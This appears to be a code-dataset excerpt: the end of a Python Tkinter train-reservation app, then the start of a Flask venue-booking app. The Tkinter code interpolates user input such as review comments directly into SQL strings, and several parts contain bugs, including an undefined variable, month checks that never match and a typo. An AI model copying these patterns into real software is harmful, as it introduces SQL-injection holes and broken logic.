self.mainMenu()\n\n def viewReview(self):\n self.primaryWindow.withdraw()\n self.viewReviewWin = Toplevel()\n self.viewReviewWin.title(\"View Review\")\n\n frame = Frame(self.viewReviewWin)\n frame.pack()\n\n l1 = Label(frame, text = \"Train Number\")\n l1.grid(row = 0, column = 0, sticky = W)\n e1 = Entry(frame, textvariable = self.TrainReviewNumber, width = 20)\n e1.grid(row = 0, column = 1)\n b1 = Button(frame, text = \"Back\", command = self.backMain)\n b1.grid(row = 1, column = 0)\n b2 = Button(frame, text = \"Next\", command = self.viewReview2)\n b2.grid(row = 1, column = 1)\n\n def backMain(self):\n self.viewReviewWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def viewTree(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"select\",\"train\",\"time\",\"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"select\", text= \"Select\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"time\", text= \"Time (Duration)\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= 
\"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def viewReview2(self):\n self.viewReviewWin.withdraw()\n self.viewReviewWin2 = Toplevel()\n self.viewReviewWin2.title(\"View Review\")\n\n frame = Frame(self.viewReviewWin2)\n frame.pack()\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT Comment, Rating FROM REVIEW WHERE REVIEW.Train_Number = '%d'\" % (TrainReviewNumber)\n cursor.execute(query)\n results = cursor.fetchall()\n\n tree = self.viewTree(frame)\n\n b1 = Button(frame, text = \"Back to Choose Functionality\", command = self.switchMainMenu)\n b1.pack(side = BOTTOM)\n\n def switchMainMenu(self):\n self.viewReviewWin2.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def giveReview(self):\n self.primaryWindow.destroy()\n self.giveReviewWin = Toplevel()\n self.giveReviewWin.title(\"Give Review\")\n\n frame = Frame(self.giveReviewWin)\n frame.pack()\n\n self.trainNo = IntVar()\n l1 = Label(frame, text = \"Train Number\")\n l1.grid(row = 0, column = 0, sticky = W)\n e1 = Entry(frame, textvariable = self.trainNo, width = 20)\n e1.grid(row = 0, column = 1)\n\n l2 = Label(frame, text = \"Rating\")\n l2.grid(row = 1, column = 0, sticky = W)\n self.rating = StringVar()\n self.cho = [\"Very Good\", \"Good\", \"Neutral\", \"Bad\", \"Very Bad\"]\n\n option = OptionMenu(frame, self.rating, self.cho[0], *self.cho)\n option.grid(row = 1, column = 1)\n\n self.comment = StringVar()\n l3 = Label(frame, text = \"Comment\")\n l3.grid(row = 2, column = 0, sticky = W)\n e3 = Entry(frame, textvariable = self.comment, width = 20)\n e3.grid(row = 2, column = 1)\n\n b1=Button(frame, text =\"Submit\", command = self.verifyRev)\n b1.grid(row = 3, column = 1)\n\n\n def verifyRev(self):\n if self.trainNo == \"\":\n messagebox.showerror(\"Error\", \"Enter a train number\")\n if self.trainNo == \"\" or self.rating == \"\":\n messagebox.showerror(\"Error\", \"Train Number and Rating cannot be left blank.\")\n else:\n self.rate = 5\n if self.rating.get() == self.cho[0]:\n self.rate = 5\n elif self.rating.get() == self.cho[1]:\n self.rate = 4\n elif self.rating.get() == self.cho[2]:\n self.rate = 3\n elif self.rating.get() == self.cho[3]:\n self.rate = 2\n elif self.rating.get() == self.cho[4]:\n self.rate = 1\n\n server = self.Connect()\n cursor = server.cursor()\n queryFrom = \"SELECT MAX(Review_Number) FROM REVIEW\"\n cursor.execute(queryFrom)\n result = cursor.fetchall()\n\n query = \"INSERT INTO REVIEW(Review_Number, Comment, Rating, Username, Train_Number) VALUES ('%d', '%s', '%d', '%s', '%d')\" % (result[0][0] + 1, self.comment.get(), self.rate, self.username.get(), self.trainNo.get())\n cursor.execute(query)\n server.commit()\n cursor.close()\n server.close()\n self.giveReviewWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n ################ check to see if the train number is valid###############################\n def mainBack(self):\n if self.trainNo == \"\":\n messagebox.showerror(\"Error\", \"Enter a train number\")\n ######elif ##train number isnt correct:\n else:\n self.giveReviewWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n ###########write the rating to a DB#################\n\n\n def viewTree2(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"mon\",\"rev\")\n tree.heading(\"mon\", text= \"Month\")\n 
tree.heading(\"rev\", text= \"Revenue\")\n return tree\n\n def viewRevenueRep(self):\n self.primaryWindow.withdraw()\n self.viewRevenueReport = Toplevel()\n self.viewRevenueReport.title(\"View Revenue Report\")\n\n frame = Frame(self.viewRevenueReport)\n frame.pack()\n\n current = datetime.datetime.now().strftime(\"%Y-%m-01\")\n backOne = (datetime.datetime.now() - datetime.timedelta(30)).strftime(\"%Y-%m-01\")\n backTwo = (datetime.datetime.now() - datetime.timedelta(60)).strftime(\"%Y-%m-01\")\n backThree = (datetime.datetime.now() - datetime.timedelta(90)).strftime(\"%Y-%m-01\")\n\n\n if backOne == \"01\":\n backOneShow = \"January\"\n if backOne == \"02\":\n backOneShow = \"February\"\n if backOne == \"03\":\n backOneShow = \"March\"\n if backOne == \"04\":\n backOneShow = \"April\"\n if backOne == \"05\":\n backOneShow = \"May\"\n if backOne == \"06\":\n backOneShow = \"June\"\n if backOne == \"07\":\n backOneShow = \"July\"\n if backOne == \"08\":\n backOneShow = \"August\"\n if backOne == \"09\":\n backOneShow = \"September\"\n if backOne == \"10\":\n backOneShow = \"October\"\n if backOne == \"11\":\n backOneShow = \"November\"\n if backOne == \"12\":\n backOneShow = \"December\"\n\n\n if backTwo == \"01\":\n backTwoShow = \"January\"\n if backTwo == \"02\":\n backTwoShow = \"February\"\n if backTwo == \"03\":\n backTwoShow = \"March\"\n if backTwo == \"04\":\n backTwoShow = \"April\"\n if backTwo == \"05\":\n backTwoShow = \"May\"\n if backTwo == \"06\":\n backTwoShow = \"June\"\n if backTwo == \"07\":\n backTwoShow = \"July\"\n if backTwo == \"08\":\n backTwoShow = \"August\"\n if backTwo == \"09\":\n backTwoShow = \"September\"\n if backTwo == \"10\":\n backTwoShow = \"October\"\n if backTwo == \"11\":\n backTwoShow = \"November\"\n if backTwo == \"12\":\n backTwoShow = \"December\"\n\n if backThree == \"01\":\n backThreeShow = \"January\"\n if backThree == \"02\":\n backThreeShow = \"February\"\n if backThree == \"03\":\n backThreeShow = \"March\"\n if backThree == \"04\":\n backThreeShow = \"April\"\n if backThree == \"05\":\n backThreeShow = \"May\"\n if backThree == \"06\":\n backThreeShow = \"June\"\n if backThree == \"07\":\n backThreeShow = \"July\"\n if backThree == \"08\":\n backThreeShow = \"August\"\n if backThree == \"09\":\n backThreeShow = \"September\"\n if backThree == \"10\":\n backThreeShow = \"October\"\n if backThree == \"11\":\n backThreeShow = \"November\"\n if backThree == \"12\":\n backThreeShow = \"December\"\n\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"SELECT SUM(Total_Cost) FROM RESERVES WHERE Departure_Date > '%s' AND Departure_Date < '%s'\" % (backThree, backTwo)\n query2 = \"SELECT SUM(Total_Cost) FROM RESERVES WHERE Departure_Date > '%s' AND Departure_Date < '%s'\" % (backTwo, backOne)\n query3 = \"SELECT SUM(Total_Cost) FROM RESERVES WHERE Departure_Date > '%s' AND Departure_Date < '%s'\" % (backOne, current)\n cursor.execute(query1)\n result1 = cursor.fetchall()\n cursor.execute(query2)\n result2 = cursor.fetchall()\n cursor.execute(query3)\n result3 = cursor.fetchall()\n\n tree = self.viewTree2(frame)\n tree.insert('', 0, text='', values=(backThreeShow, result1[0][0]))\n tree.insert('', 1, text='', values=(backTwoShow, result2[0][0]))\n tree.insert('', 2, text='', values=(backOneShow, result3[0][0]))\n\n b1 = Button(frame, text = \"Back\", command = self.switchMain)\n b1.pack(side = BOTTOM)\n\n def switchMain(self):\n self.viewRevenueReport.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def 
viewTree3(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"mon\",\"num\",\"rsv\")\n tree.heading(\"mon\", text= \"Month\")\n tree.heading(\"num\", text= \"Train number\")\n tree.heading(\"rsv\", text= \"#of Reservations\")\n return tree\n\n def viewpopRR(self):\n #to store in tree somehow\n\n #Month - Route - Reservations\n #backThreeShow results1[0][0] results1[0][1]\n # results1[1][0] results1[1][1]\n # results1[2][0] results1[2][1]\n #backTwoShow results2[0][0] results2[0][1]\n # results2[1][0] results2[1][1]\n # results2[2][0] results2[2][1]\n #backOneShow results3[0][0] results3[0][1]\n # results3[1][0] results3[1][1]\n # results3[2][0] results3[2][1]\n\n self.primaryWindow.withdraw()\n self.viewpopRRWin = Toplevel()\n self.viewpopRRWin.title(\"View Popular Route Report\")\n frame = Frame(self.viewpopRRWin)\n frame.pack()\n\n current = datetime.datetime.now().strftime(\"%Y-%m-01\")\n backOne = (datetime.datetime.now() - datetime.timedelta(30)).strftime(\"%Y-%m-01\")\n backTwo = (datetime.datetime.now() - datetime.timedelta(60)).strftime(\"%Y-%m-01\")\n backThree = (datetime.datetime.now() - datetime.timedelta(90)).strftime(\"%Y-%m-01\")\n\n backOneM = backOne[5:7]\n backTwoM = backTwo[5:7]\n backThreeM = backThree[5:7]\n backOneShow = \"\"\n backTwoShow = \"\"\n backThreeShow = \"\"\n\n if backOneM == \"01\":\n backOneShow = \"January\"\n if backOneM == \"02\":\n backOneShow = \"February\"\n if backOneM == \"03\":\n backOneShow = \"March\"\n if backOneM == \"04\":\n backOneShow = \"April\"\n if backOneM == \"05\":\n backOneShow = \"May\"\n if backOneM == \"06\":\n backOneShow = \"June\"\n if backOneM == \"07\":\n backOneShow = \"July\"\n if backOneM == \"08\":\n backOneShow = \"August\"\n if backOneM == \"09\":\n backOneShow = \"September\"\n if backOneM == \"10\":\n backOneShow = \"October\"\n if backOneM == \"11\":\n backOneShow = \"November\"\n if backOneM == \"12\":\n backOneShow = \"December\"\n\n\n if backTwoM == \"01\":\n backTwoShow = \"January\"\n if backTwoM == \"02\":\n backTwoShow = \"February\"\n if backTwoM == \"03\":\n backTwoShow = \"March\"\n if backTwoM == \"04\":\n backTwoShow = \"April\"\n if backTwoM == \"05\":\n backTwoShow = \"May\"\n if backTwoM == \"06\":\n backTwoShow = \"June\"\n if backTwoM == \"07\":\n backTwoShow = \"July\"\n if backTwoM == \"08\":\n backTwoShow = \"August\"\n if backTwoM == \"09\":\n backTwoShow = \"September\"\n if backTwoM == \"10\":\n backTwoShow = \"October\"\n if backTwoM == \"11\":\n backTwoShow = \"November\"\n if backTwoM == \"12\":\n backTwoShow = \"December\"\n\n if backThreeM == \"01\":\n backThreeShow = \"January\"\n if backThreeM == \"02\":\n backThreeShow = \"February\"\n if backThreeM == \"03\":\n backThreeShow = \"March\"\n if backThreeM == \"04\":\n backThreeShow = \"April\"\n if backThreeM == \"05\":\n backThreeShow = \"May\"\n if backThreeM == \"06\":\n backThreeShow = \"June\"\n if backThreeM == \"07\":\n backThreeShow = \"July\"\n if backThreeM == \"08\":\n backThreeShow = \"August\"\n if backThreeM == \"09\":\n backThreeShow = \"September\"\n if backThreeM == \"10\":\n backThreeShow = \"October\"\n if backThreeM == \"11\":\n backThreeShow = \"November\"\n if backThreeM == \"12\":\n bakcThreeShow = \"December\"\n\n server = self.Connect()\n cursor = server.cursor()\n queryMonth1 = \"CREATE VIEW Month1 (Reservations, TNumber) AS SELECT ReservationID, Train_Number FROM RESERVATION NATURAL JOIN RESERVES WHERE Is_cancelled = '%d' AND Departure_Date > '%s' AND 
Departure_Date < '%s'\" % (0, backThree, backTwo)\n cursor.execute(queryMonth1)\n queryHere1 = \"SELECT TNumber, COUNT(DISTINCT Reservations) FROM Month1 GROUP BY TNumber\"\n cursor.execute(queryHere1)\n tempResults1 = cursor.fetchall()\n queryPerTrain1 = \"CREATE TABLE PerTrain1(Route INT(10), Num INT(10))\"\n cursor.execute(queryPerTrain1)\n for result in tempResults1:\n self.TNumber = result[0]\n self.countReservations = result[1]\n queryFillTrain1 = \"INSERT INTO PerTrain1(Route, Num) VALUES ('%d', '%d')\" % (self.TNumber, self.countReservations)\n cursor.execute(queryFillTrain1)\n server.commit()\n queryUltimate1 = \"SELECT * FROM PerTrain1\"\n cursor.execute(queryUltimate1)\n preResults11 = cursor.fetchall()\n maxNum11 = 0\n maxTup11 = (0,0)\n for result in preResults11:\n if result[1] > maxNum11:\n maxNum11 = result[1]\n maxTup11 = (result[0], result[1])\n results1 = []\n results1.append(maxTup11)\n if len(results1) < 3:\n queryNext = \"DELETE FROM PerTrain1 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryPenultimate1 = \"SELECT * FROM PerTrain1\"\n cursor.execute(queryPenultimate1)\n preResults12 = cursor.fetchall()\n maxNum12 = 0\n maxTup12 = (0,0)\n for result in preResults12:\n if result[1] > maxNum12:\n maxNum12 = result[1]\n maxTup12 = (result[0], result[1])\n results1.append(maxTup12)\n if len(results1) < 3:\n queryNext = \"DELETE FROM PerTrain1 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryAntepenultimate1 = \"SELECT * FROM PerTrain1\"\n cursor.execute(queryAntepenultimate1)\n preResults13 = cursor.fetchall()\n maxNum13 = 0\n maxTup13 = (0,0)\n for result in preResults13:\n if result[1] > maxNum13:\n maxNum13 = result[1]\n maxTup13 = (result[0], result[1])\n results1.append(maxTup13)\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n else:\n pass\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n else:\n pass\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n\n queryMonth2 = \"CREATE VIEW Month2 (Reservations, TNumber) AS SELECT ReservationID, Train_Number FROM RESERVATION NATURAL JOIN RESERVES WHERE Is_cancelled = '%d' AND Departure_Date > '%s' AND Departure_Date < '%s'\" % (0, backTwo, backOne)\n cursor.execute(queryMonth2)\n queryHere2 = \"SELECT TNumber, COUNT(DISTINCT Reservations) FROM Month2 GROUP BY TNumber\"\n cursor.execute(queryHere2)\n tempResults2 = cursor.fetchall()\n queryPerTrain2 = \"CREATE TABLE PerTrain2(Route INT(10), Num INT(10))\"\n cursor.execute(queryPerTrain2)\n for result in tempResults2:\n self.TNumber = result[0]\n self.countReservations = result[1]\n queryFillTrain2 = \"INSERT INTO PerTrain2(Route, Num) VALUES ('%d', '%d')\" % (self.TNumber, self.countReservations)\n cursor.execute(queryFillTrain2)\n server.commit()\n queryUltimate2 = \"SELECT * FROM PerTrain2\"\n cursor.execute(queryUltimate2)\n preResults21 = cursor.fetchall()\n maxNum21 = 0\n maxTup21 = (0,0)\n for result in preResults21:\n if result[1] > maxNum21:\n maxNum21 = result[1]\n maxTup21 = (result[0], result[1])\n results2 = []\n results2.append(maxTup21)\n if len(results2) < 3:\n queryNext = \"DELETE FROM PerTrain2 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryPenultimate2 = \"SELECT * FROM PerTrain2\"\n cursor.execute(queryPenultimate2)\n preResults22 = cursor.fetchall()\n maxNum22 = 0\n maxTup22 = (0,0)\n for result in 
preResults22:\n if result[1] > maxNum22:\n maxNum22 = result[1]\n maxTup22 = (result[0], result[1])\n results2.append(maxTup22)\n if len(results2) < 3:\n queryNext = \"DELETE FROM PerTrain2 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryAntepenultimate2 = \"SELECT * FROM PerTrain2\"\n cursor.execute(queryAntepenultimate2)\n preResults23 = cursor.fetchall()\n maxNum23 = 0\n maxTup23 = (0,0)\n for result in preResults23:\n if result[1] > maxNum23:\n maxNum23 = result[1]\n maxTup23 = (result[0], result[1])\n results2.append(maxTup23)\n #insert table stuff here; results2[0][0] = route num, results2[0][1] = max # of reservations, etc, up to results2[2][1]\n else:\n pass\n #insert table stuff here; results2[0][0] = route num, results2[0][1] = max # of reservations, etc, up to results2[2][1]\n else:\n pass\n #insert table stuff here; results2[0][0] = route num, results2[0][1] = max # of reservations, etc, up to results2[2][1]\n\n queryMonth3 = \"CREATE VIEW Month3 (Reservations, TNumber) AS SELECT ReservationID, Train_Number FROM RESERVATION NATURAL JOIN RESERVES WHERE Is_cancelled = '%d' AND Departure_Date > '%s' AND Departure_Date < '%s'\" % (0, backOne, current)\n cursor.execute(queryMonth3)\n queryHere3 = \"SELECT TNumber, COUNT(DISTINCT Reservations) FROM Month3 GROUP BY TNumber\"\n cursor.execute(queryHere3)\n tempResults3 = cursor.fetchall()\n queryPerTrain3 = \"CREATE TABLE PerTrain3(Route INT(10), Num INT(10))\"\n cursor.execute(queryPerTrain3)\n for result in tempResults3:\n self.TNumber = result[0]\n self.countReservations = result[1]\n queryFillTrain3 = \"INSERT INTO PerTrain3(Route, Num) VALUES ('%d', '%d')\" % (self.TNumber, self.countReservations)\n cursor.execute(queryFillTrain3)\n server.commit()\n queryUltimate3 = \"SELECT * FROM PerTrain3\"\n cursor.execute(queryUltimate3)\n preResults31 = cursor.fetchall()\n maxNum31 = 0\n maxTup31 = (0,0)\n for result in preResults31:\n if result[1] > maxNum31:\n maxNum31 = result[1]\n maxTup31 = (result[0], result[1])\n results3 = []\n results3.append(maxTup31)\n if len(results3) < 3:\n queryNext = \"DELETE FROM PerTrain3 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryPenultimate3 = \"SELECT * FROM PerTrain3\"\n cursor.execute(queryPenultimate3)\n preResults32 = cursor.fetchall()\n maxNum32 = 0\n maxTup32 = (0,0)\n for result in preResults32:\n if result[1] > maxNum32:\n maxNum32 = result[1]\n maxTup32 = (result[0], result[1])\n results3.append(maxTup32)\n if len(results3) < 3:\n queryNext = \"DELETE FROM PerTrain3 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryAntepenultimate3 = \"SELECT * FROM PerTrain3\"\n cursor.execute(queryAntepenultimate3)\n preResults33 = cursor.fetchall()\n maxNum33 = 0\n maxTup33 = (0,0)\n for result in preResults33:\n if result[1] > maxNum33:\n maxNum33 = result[1]\n maxTup33 = (result[0], result[1])\n results3.append(maxTup33)\n #insert table stuff here; results3[0][0] = route num, results3[0][1] = max # of reservations, etc, up to results3[2][1]\n else:\n pass\n #insert table stuff here; results3[0][0] = route num, results3[0][1] = max # of reservations, etc, up to results3[2][1]\n else:\n pass\n #insert table stuff here; results3[0][0] = route num, results3[0][1] = max # of reservations, etc, up to results3[2][1]\n\n queryDrop11 = \"DROP VIEW Month1\"\n queryDrop12 = \"DROP TABLE PerTrain1\"\n queryDrop21 = \"DROP VIEW Month2\"\n queryDrop22 = \"DROP TABLE PerTrain2\"\n queryDrop31 = \"DROP VIEW Month3\"\n queryDrop32 = \"DROP TABLE PerTrain3\"\n 
cursor.execute(queryDrop11)\n cursor.execute(queryDrop12)\n cursor.execute(queryDrop21)\n cursor.execute(queryDrop22)\n cursor.execute(queryDrop31)\n cursor.execute(queryDrop32)\n server.commit()\n cursor.close()\n server.close()\n\n tree = self.viewTree3(frame)\n tree.insert('', 0, text='', values=(backThreeShow, results1[0][0], results1[0][1]))\n tree.insert('', 1, text='', values=(backThreeShow, results1[1][0], results1[1][1]))\n tree.insert('', 2, text='', values=(backThreeShow, results1[2][0], results1[2][1]))\n tree.insert('', 3, text='', values=(backTwoShow, results2[0][0], results2[0][1]))\n tree.insert('', 4, text='', values=(backTwoShow, results2[1][0], results2[1][1]))\n tree.insert('', 5, text='', values=(backTwoShow, results2[2][0], results2[2][1]))\n tree.insert('', 6, text='', values=(backOneShow, results3[0][0], results3[0][1]))\n tree.insert('', 7, text='', values=(backOneShow, results3[1][0], results3[1][1]))\n tree.insert('', 8, text='', values=(backOneShow, results3[2][0], results3[2][1]))\n\n\n def swtMain(self):\n self.viewpopRRWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\nmw = Tk()\napp = Phase_three(mw)\nmw.mainloop()\n","repo_name":"achiang31/Train_4400","sub_path":"p3.py","file_name":"p3.py","file_ext":"py","file_size_in_byte":73124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
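The viewpopRR method above peels off each month's top three routes by re-SELECTing the current maximum row and DELETE-ing it from a scratch table. One aggregate query returns the same three rows per month. A sketch under stated assumptions: the same RESERVATION/RESERVES schema as the file, a DB-API cursor, and the %s paramstyle used by MySQL drivers; query parameters replace the file's %-interpolation, which is unsafe with user input.

def top_three_routes(cursor, start_date, end_date):
    # Top 3 train numbers by distinct non-cancelled reservations in the window,
    # i.e. one month's results1/results2/results3 list from the code above.
    cursor.execute(
        "SELECT Train_Number, COUNT(DISTINCT ReservationID) AS n "
        "FROM RESERVATION NATURAL JOIN RESERVES "
        "WHERE Is_cancelled = 0 AND Departure_Date > %s AND Departure_Date < %s "
        "GROUP BY Train_Number ORDER BY n DESC LIMIT 3",
        (start_date, end_date))
    return cursor.fetchall()  # [(train_number, count), ...], at most 3 rows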
+{"seq_id":"39782305374","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\n\nfrom datetime import datetime\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\n\n# TODO: connect to a local postgresql database\n# --> Done. Please check details in config.py\n\nfrom flask_migrate import Migrate\nmigrate = Migrate(app, db)\n\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\n\nclass Venue(db.Model):\n __tablename__ = 'venues'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n city = db.Column(db.String(120))\n state = db.Column(db.String(120))\n address = db.Column(db.String(120))\n phone = db.Column(db.String(120))\n image_link = db.Column(db.String(500))\n facebook_link = db.Column(db.String(120))\n\n # TODO: implement any missing fields, as a database migration using Flask-Migrate\n # done. added columns: genres, website_link, seeking_talent, seeking_description, and relations: shows\n genres = db.Column(db.String(120))\n website_link = db.Column(db.String(120))\n seeking_talent = db.Column(db.Boolean, default=False)\n seeking_description = db.Column(db.String(120))\n shows = db.relationship('Show', backref='venue', lazy=True)\n \n def __repr__(self):\n return \"\" %(self.id, self.name)\n\nclass Artist(db.Model):\n __tablename__ = 'artists'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n city = db.Column(db.String(120))\n state = db.Column(db.String(120))\n phone = db.Column(db.String(120))\n genres = db.Column(db.String(120))\n image_link = db.Column(db.String(500))\n facebook_link = db.Column(db.String(120))\n\n # TODO: implement any missing fields, as a database migration using Flask-Migrate\n # done. added columns: website_link, seeking_venue, seeking_description, and relations: shows\n website_link = db.Column(db.String(120))\n seeking_venue = db.Column(db.Boolean, default=False)\n seeking_description = db.Column(db.String(120))\n shows = db.relationship('Show', backref='artist', lazy=True)\n \n def __repr__(self):\n return \"\" %(self.id, self.name)\n\n# TODO Implement Show and Artist models, and complete all model relationships and properties, as a database migration.\n# done. 
Check details in each model class\n\n\nclass Show(db.Model):\n __tablename__ = 'shows'\n\n id = db.Column(db.Integer, primary_key=True)\n artist_id = db.Column(db.Integer, db.ForeignKey('artists.id'), nullable=False)\n venue_id = db.Column(db.Integer, db.ForeignKey('venues.id'), nullable=False)\n start_time = db.Column(db.DateTime, default=datetime.now(), nullable=False)\n\n def __repr__(self):\n return \"\" %(self.id, self.artist_id, self.venue_id, self.start_time)\n\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\nfrom babel.dates import format_datetime\n\ndef format_datetime(value, format='medium'):\n # instead of just date = dateutil.parser.parse(value)\n # added if/else to handeled a datetime input\n if isinstance(value, str):\n date = dateutil.parser.parse(value)\n else:\n date = value\n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format, locale='en')\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n # TODO: replace with real venues data.\n # num_upcoming_shows should be aggregated based on number of upcoming shows per venue.\n # find all city/state\n cityState = db.session.query(Venue.city, Venue.state).distinct(Venue.city, Venue.state)\n ans = [] \n for cs in cityState:\n venue_info = Venue.query.filter_by(state = cs.state).filter_by(city = cs.city).all()\n venue_detail = []\n for ven in venue_info:\n venue_detail.append({'id': ven.id, \n 'name': ven.name, \n 'num_upcoming_shows': len( db.session.query(Show).filter(Show.start_time > datetime.now(), Show.venue_id == ven.id).all() )})\n ans.append( {'city': cs.city, 'state': cs.state, 'venues': venue_detail} ) \n \n return render_template('pages/venues.html', areas=ans);\n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n # TODO: implement search on artists with partial string search. 
Ensure it is case-insensitive.\n # search for \"Hop\" should return \"The Musical Hop\".\n # search for \"Music\" should return \"The Musical Hop\" and \"Park Square Live Music & Coffee\"\n response = {}\n search_term = request.form.get('search_term', '')\n venues = Venue.query.filter(Venue.name.ilike(\"%\" + search_term + \"%\")).all()\n data = []\n for venue in venues:\n data.append( {\"id\": venue.id, \n 'name': venue.name, \n 'num_upcoming_shows': len( db.session.query(Show).filter(Show.start_time > datetime.now(), Show.venue_id == venue.id).all() )} )\n response['count'] = len(data)\n response['data'] = data\n return render_template('pages/search_venues.html', results=response, search_term=search_term)\n\n@app.route('/venues/<int:venue_id>')\ndef show_venue(venue_id):\n # shows the venue page with the given venue_id\n # TODO: replace with real venue data from the venues table, using venue_id\n # done.\n venue = Venue.query.get(venue_id)\n genres = venue.genres.replace('{', '').replace('}', '').split(',')\n data = {\"id\": venue.id,\n \"name\": venue.name,\n \"genres\": genres,\n \"address\": venue.address,\n \"city\": venue.city,\n \"state\": venue.state,\n \"phone\": venue.phone,\n \"website\": venue.website_link,\n \"facebook_link\": venue.facebook_link,\n \"seeking_talent\": venue.seeking_talent,\n \"seeking_description\": venue.seeking_description,\n \"image_link\": venue.image_link,\n \"past_shows\": [],\n \"upcoming_shows\": [],\n \"past_shows_count\": 0,\n \"upcoming_shows_count\": 0,\n }\n # past shows\n past_shows_list = []\n past_shows_db = Show.query.filter(Show.start_time < datetime.now(), Show.venue_id == venue_id).all()\n for show in past_shows_db:\n artist = Artist.query.get(show.artist_id)\n past_shows_list.append( {'artist_id': show.artist_id, 'artist_name': artist.name, 'artist_image_link': artist.image_link ,'start_time': show.start_time} )\n # future shows\n future_shows_list = []\n future_shows_db = Show.query.filter(Show.start_time >= datetime.now(), Show.venue_id == venue_id).all()\n for show in future_shows_db:\n artist = Artist.query.get(show.artist_id)\n future_shows_list.append( {'artist_id': show.artist_id, 'artist_name': artist.name, 'artist_image_link': artist.image_link ,'start_time': show.start_time} )\n data['past_shows'] = past_shows_list\n data['upcoming_shows'] = future_shows_list\n data['past_shows_count'] = len(past_shows_list)\n data['upcoming_shows_count'] = len(future_shows_list)\n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n # TODO: insert form data as a new Venue record in the db, instead\n # TODO: modify data to be the data object returned from db insertion\n # done.\n try:\n venue = Venue(name = request.form['name'],\n city = request.form['city'],\n state = request.form['state'],\n address = request.form['address'],\n phone = request.form['phone'],\n image_link = request.form['image_link'],\n facebook_link = request.form['facebook_link'],\n genres = request.form.getlist('genres'),\n website_link = request.form['website_link'],\n seeking_talent = request.form.get('seeking_talent') == 'y',\n seeking_description = request.form['seeking_description'] )\n db.session.add(venue)\n db.session.commit()\n # on successful db insert, flash success\n flash('Venue ' + request.form['name'] + ' was successfully listed!')\n except:\n db.session.rollback()\n flash('An error occurred. Venue ' + request.form['name'] + ' could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n@app.route('/venues/<venue_id>', methods=['DELETE'])\ndef delete_venue(venue_id):\n # TODO: Complete this endpoint for taking a venue_id, and using\n # SQLAlchemy ORM to delete a record. Handle cases where the session commit could fail.\n # done.\n try:\n Venue.query.filter_by(id=venue_id).delete()\n db.session.commit()\n except:\n db.session.rollback()\n finally:\n db.session.close()\n\n # BONUS CHALLENGE: Implement a button to delete a Venue on a Venue Page, have it so that\n # clicking that button deletes it from the db and then redirects the user to the homepage\n # please check show_venue.html for details\n return render_template('pages/home.html')\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n # TODO: replace with real data returned from querying the database\n # done.\n data = Artist.query.all()\n artists = []\n for art in data:\n artists.append( {'id': art.id, 'name': art.name} )\n return render_template('pages/artists.html', artists=artists)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n # TODO: implement search on artists with partial string search. Ensure it is case-insensitive.\n # search for 